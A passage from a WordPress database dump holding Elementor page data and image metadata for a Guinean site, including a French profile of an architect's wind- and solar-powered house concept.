bois:<\\/strong>\\u00a0avec un toit en bois effectuant des rotations sous l\'influence du vent, produisant ainsi de l\'\\u00e9nergie d\'origine \\u00e9olienne pour la maison.<\\/p><p>-<strong>Triple vitrage:\\u00a0<\\/strong>rempli d\'argon de gaz tr\\u00e8s isolent et des capteurs solaires permettant ainsi \\u00e0 la maison d\'avoir une seconde source d\\u2019\\u00e9nergie en plus de l\\u2019\\u00e9nergie d\'origine \\u00e9olienne.<\\/p><p><strong>-Mur en lambris de bois:\\u00a0<\\/strong>le bois \\u00e9conomise de l\\u2019\\u00e9nergie, c\'est un excellent isolant.<\\/p><p><strong>-Mur en lambris de bois:\\u00a0\\u00a0<\\/strong>\\u00e9conomise de l\\u2019\\u00e9nergie et conserve la fra\\u00eecheur.<\\/p><p><strong>-V\\u00e9g\\u00e9tation persistante:<\\/strong>\\u00a0Afin d\'\\u00e9viter les d\\u00e9perditions dues au vent.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2017,654,'_elementor_edit_mode','builder'),(2018,654,'_elementor_data','[{\"id\":\"euubokk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"bkemspx\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"khcjseg\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<img class=\\\"alignnone size-medium wp-image-417\\\" src=\\\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/architecte-300x169.jpg\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"169\\\" \\/>\\r\\n\\r\\nMoustapha Haidara est un jeune architecte Guin\\u00e9en, consid\\u00e9r\\u00e9 par ses pairs comme le meilleur de tous. Il a cr\\u00e9e un concept de maison particuli\\u00e8rement innovant ayant des caract\\u00e9ristiques particuli\\u00e8re:\\r\\n\\r\\n-<strong>Toit en bois:<\\/strong>\\u00a0avec un toit en bois effectuant des rotations sous l\'influence du vent, produisant ainsi de l\'\\u00e9nergie d\'origine \\u00e9olienne pour la maison.\\r\\n\\r\\n-<strong>Triple vitrage:\\u00a0<\\/strong>rempli d\'argon de gaz tr\\u00e8s isolent et des capteurs solaires permettant ainsi \\u00e0 la maison d\'avoir une seconde source d\\u2019\\u00e9nergie en plus de l\\u2019\\u00e9nergie d\'origine \\u00e9olienne.\\r\\n\\r\\n<strong>-Mur en lambris de bois:\\u00a0<\\/strong>le bois \\u00e9conomise de l\\u2019\\u00e9nergie, c\'est un excellent isolant.\\r\\n\\r\\n<strong>-Mur en lambris de bois:\\u00a0\\u00a0<\\/strong>\\u00e9conomise de l\\u2019\\u00e9nergie et conserve la fra\\u00eecheur.\\r\\n\\r\\n<strong>-V\\u00e9g\\u00e9tation persistante:<\\/strong>\\u00a0Afin d\'\\u00e9viter les d\\u00e9perditions dues au vent.\\r\\n\\r\\n&nbsp;\\r\\n\\r\\n&nbsp;\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7jptpz6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"rkl0mp3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"usnd9qg\",\"elType\":\"widget\",\"settings\":{\"wp_gallery\":[{\"id\":417,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/architecte.jpg\"},{\"id\":651,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/4.jpg\"},{\"id\":650,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/3.jpg\"},{\"id\":649,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/2.jpg\"},{\"id\":652,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/6.jpg\"},{\"id\":653,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/6-1.jpg\"}]},\"elements\":[],\"widgetType\":\"image-gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(2019,416,'_elementor_version','0.4'),(2020,655,'_wp_attached_file','2017/10/moustapha.jpg'),(2021,655,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:720;s:6:\"height\";i:960;s:4:\"file\";s:21:\"2017/10/moustapha.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"moustapha-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"moustapha-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2030,658,'_elementor_data','[{\"id\":\"euubokk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"bkemspx\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"khcjseg\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignnone size-medium wp-image-417\\\" src=\\\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/architecte-300x169.jpg\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"169\\\" \\/><\\/p><p>Moustapha Haidara est un jeune architecte Guin\\u00e9en, consid\\u00e9r\\u00e9 par ses pairs comme le meilleur de tous. Il a cr\\u00e9e un concept de maison particuli\\u00e8rement innovant ayant des caract\\u00e9ristiques particuli\\u00e8re:<\\/p><p>-<strong>Toit en bois:<\\/strong>\\u00a0avec un toit en bois effectuant des rotations sous l\'influence du vent, produisant ainsi de l\'\\u00e9nergie d\'origine \\u00e9olienne pour la maison.<\\/p><p>-<strong>Triple vitrage:\\u00a0<\\/strong>rempli d\'argon de gaz tr\\u00e8s isolent et des capteurs solaires permettant ainsi \\u00e0 la maison d\'avoir une seconde source d\\u2019\\u00e9nergie en plus de l\\u2019\\u00e9nergie d\'origine \\u00e9olienne.<\\/p><p><strong>-Mur en lambris de bois:\\u00a0<\\/strong>le bois \\u00e9conomise de l\\u2019\\u00e9nergie, c\'est un excellent isolant.<\\/p><p><strong>-Mur en lambris de bois:\\u00a0\\u00a0<\\/strong>\\u00e9conomise de l\\u2019\\u00e9nergie et conserve la fra\\u00eecheur.<\\/p><p><strong>-V\\u00e9g\\u00e9tation persistante:<\\/strong>\\u00a0Afin d\'\\u00e9viter les d\\u00e9perditions dues au vent.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7jptpz6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"rkl0mp3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"usnd9qg\",\"elType\":\"widget\",\"settings\":{\"wp_gallery\":[{\"id\":417,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/architecte.jpg\"},{\"id\":651,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/4.jpg\"},{\"id\":650,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/3.jpg\"},{\"id\":649,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/2.jpg\"},{\"id\":652,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/6.jpg\"},{\"id\":653,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/6-1.jpg\"}],\"thumbnail_size\":\"medium_large\",\"gallery_columns\":\"3\",\"open_lightbox\":\"yes\"},\"elements\":[],\"widgetType\":\"image-gallery\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4ivvdi0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1uy6ay8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"k5k2nxn\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Je suis un bloc de texte. Cliquez sur le bouton modifier pour changer ce texte. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2031,658,'_elementor_version','0.4'),(2032,658,'_elementor_css','a:3:{s:4:\"time\";i:1509030060;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(2033,658,'_elementor_edit_mode','builder'),(2036,659,'_elementor_data','[{\"id\":\"euubokk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"bkemspx\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"khcjseg\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignnone size-medium wp-image-417\\\" src=\\\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/architecte-300x169.jpg\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"169\\\" \\/><\\/p><p>Moustapha Haidara est un jeune architecte Guin\\u00e9en, consid\\u00e9r\\u00e9 par ses pairs comme le meilleur de tous. Il a cr\\u00e9e un concept de maison particuli\\u00e8rement innovant ayant des caract\\u00e9ristiques particuli\\u00e8re:<\\/p><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7jptpz6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"rkl0mp3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"usnd9qg\",\"elType\":\"widget\",\"settings\":{\"wp_gallery\":[{\"id\":417,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/architecte.jpg\"},{\"id\":651,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/4.jpg\"},{\"id\":650,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/3.jpg\"},{\"id\":649,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/2.jpg\"},{\"id\":652,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/6.jpg\"},{\"id\":653,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/6-1.jpg\"}],\"thumbnail_size\":\"medium_large\",\"gallery_columns\":\"3\",\"open_lightbox\":\"yes\"},\"elements\":[],\"widgetType\":\"image-gallery\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4ivvdi0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1uy6ay8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"k5k2nxn\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>-<strong>Toit en bois:<\\/strong>\\u00a0avec un toit en bois effectuant des rotations sous l\'influence du vent, produisant ainsi de l\'\\u00e9nergie d\'origine \\u00e9olienne pour la maison.<\\/p><p>-<strong>Triple vitrage:\\u00a0<\\/strong>rempli d\'argon de gaz tr\\u00e8s isolent et des capteurs solaires permettant ainsi \\u00e0 la maison d\'avoir une seconde source d\\u2019\\u00e9nergie en plus de l\\u2019\\u00e9nergie d\'origine \\u00e9olienne.<\\/p><p><strong>-Mur en lambris de bois:\\u00a0<\\/strong>le bois \\u00e9conomise de l\\u2019\\u00e9nergie, c\'est un excellent isolant.<\\/p><p><strong>-Mur en lambris de bois:\\u00a0\\u00a0<\\/strong>\\u00e9conomise de l\\u2019\\u00e9nergie et conserve la fra\\u00eecheur.<\\/p><p><strong>-V\\u00e9g\\u00e9tation persistante:<\\/strong>\\u00a0Afin d\'\\u00e9viter les d\\u00e9perditions dues au vent.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2037,659,'_elementor_version','0.4'),(2038,659,'_elementor_edit_mode','builder'),(2039,416,'_elementor_css','a:3:{s:4:\"time\";i:1509030251;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(2044,416,'_li_love_count','4'),(2045,619,'_li_love_count','2'),(2046,662,'_edit_last','1'),(2047,662,'_edit_lock','1509962563:1'),(2048,662,'_wp_page_template','default'),(2051,665,'_wp_attached_file','2017/10/poes.jpg'),(2052,665,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:345;s:6:\"height\";i:345;s:4:\"file\";s:16:\"2017/10/poes.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"poes-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"poes-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2053,666,'_wp_attached_file','2017/10/mayalagny.jpg'),(2054,666,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:636;s:6:\"height\";i:960;s:4:\"file\";s:21:\"2017/10/mayalagny.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"mayalagny-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"mayalagny-199x300.jpg\";s:5:\"width\";i:199;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:10:\"Yvan Brien\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:24:\"Yvan Brien Photographies\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2055,662,'_thumbnail_id','815'),(2060,662,'post_views_count','761'),(2065,670,'_edit_last','1'),(2066,670,'_edit_lock','1509537710:1'),(2067,670,'_wp_page_template','default'),(2070,673,'_wp_attached_file','2017/10/sekou.jpg'),(2071,673,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:696;s:6:\"height\";i:707;s:4:\"file\";s:17:\"2017/10/sekou.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"sekou-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"sekou-295x300.jpg\";s:5:\"width\";i:295;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2072,670,'_thumbnail_id','673'),(2075,670,'post_views_count','2057'),(2083,678,'_edit_last','1'),(2084,678,'_edit_lock','1509537478:1'),(2085,679,'_wp_attached_file','2017/10/Jawards.jpg'),(2086,679,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:768;s:6:\"height\";i:507;s:4:\"file\";s:19:\"2017/10/Jawards.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"Jawards-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"Jawards-300x198.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"Jawards-768x507.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:507;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2087,678,'_thumbnail_id','679'),(2088,678,'_wp_page_template','default'),(2093,678,'post_views_count','178'),(2094,681,'_edit_last','1'),(2095,681,'_edit_lock','1509536835:1'),(2096,682,'_wp_attached_file','2017/10/Culture.jpg'),(2097,682,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:576;s:4:\"file\";s:19:\"2017/10/Culture.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"Culture-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"Culture-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"Culture-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"Culture-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.7\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:23:\"Canon PowerShot SX40 HS\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1494528834\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.3\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(2098,681,'_thumbnail_id','682'),(2099,681,'_wp_page_template','default'),(2104,681,'post_views_count','680'),(2268,740,'_elementor_edit_mode','builder'),(2269,740,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\